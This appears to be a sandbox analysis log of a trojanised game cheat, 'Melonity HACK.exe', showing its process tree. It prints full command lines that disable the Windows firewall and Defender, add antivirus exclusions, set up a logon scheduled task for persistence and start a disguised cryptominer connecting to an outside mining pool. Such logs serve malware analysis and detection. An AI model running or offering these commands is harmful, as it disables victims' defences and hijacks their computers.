C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\min.exe"C:\ProgramData\Defender\min.exe"4⤵
- Executes dropped EXE
-
C:\ProgramData\Defender\Start.exeC:\ProgramData\Defender\Start.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9A9A.tmp\9A9B.tmp\9A9C.bat C:\ProgramData\Defender\Start.exe"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\system32\timeout.exeTIMEOUT /t 107⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps19⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ri0px40l\ri0px40l.cmdline"10⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA74.tmp" "c:\Users\Admin\AppData\Local\Temp\ri0px40l\CSCAB1027E5856E44C4BC98767FEC61198B.TMP"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"10⤵
-
C:\ProgramData\Defender\Windows Protection.exe"C:\ProgramData\Defender\Windows Protection.exe"11⤵
-
C:\ProgramData\Defender\Windows Process.exe"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
- Executes dropped EXE
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Executes dropped EXE
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"10⤵
-
C:\ProgramData\Defender\Windows Protection.exe"C:\ProgramData\Defender\Windows Protection.exe"11⤵
-
C:\ProgramData\Defender\Windows Process.exe"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x11⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"8⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C515.tmp\C516.tmp\C517.bat "C:\ProgramData\Task Host\svchost.exe""8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6828 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7040 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7164 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7200 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6984 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6404 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
- Checks computer location settings
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off4⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
- Checks computer location settings
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off4⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\ProgramData\Defender\min.exe"C:\ProgramData\Defender\min.exe"3⤵
-
C:\ProgramData\Defender\Start.exeC:\ProgramData\Defender\Start.exe4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C757.tmp\C758.tmp\C759.bat C:\ProgramData\Defender\Start.exe"5⤵
-
C:\Windows\system32\timeout.exeTIMEOUT /t 106⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps18⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0xrdeww\x0xrdeww.cmdline"9⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF117.tmp" "c:\Users\Admin\AppData\Local\Temp\x0xrdeww\CSCD41496A7B9DC475C87FF9C48CB44F9B.TMP"10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE86.tmp\EE87.tmp\EE88.bat "C:\ProgramData\Task Host\svchost.exe""8⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE09.tmp\EE0A.tmp\EE0B.bat "C:\ProgramData\Task Host\svchost.exe""7⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C544.tmp\C545.tmp\C546.bat "C:\ProgramData\Task Host\svchost.exe""1⤵
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
-
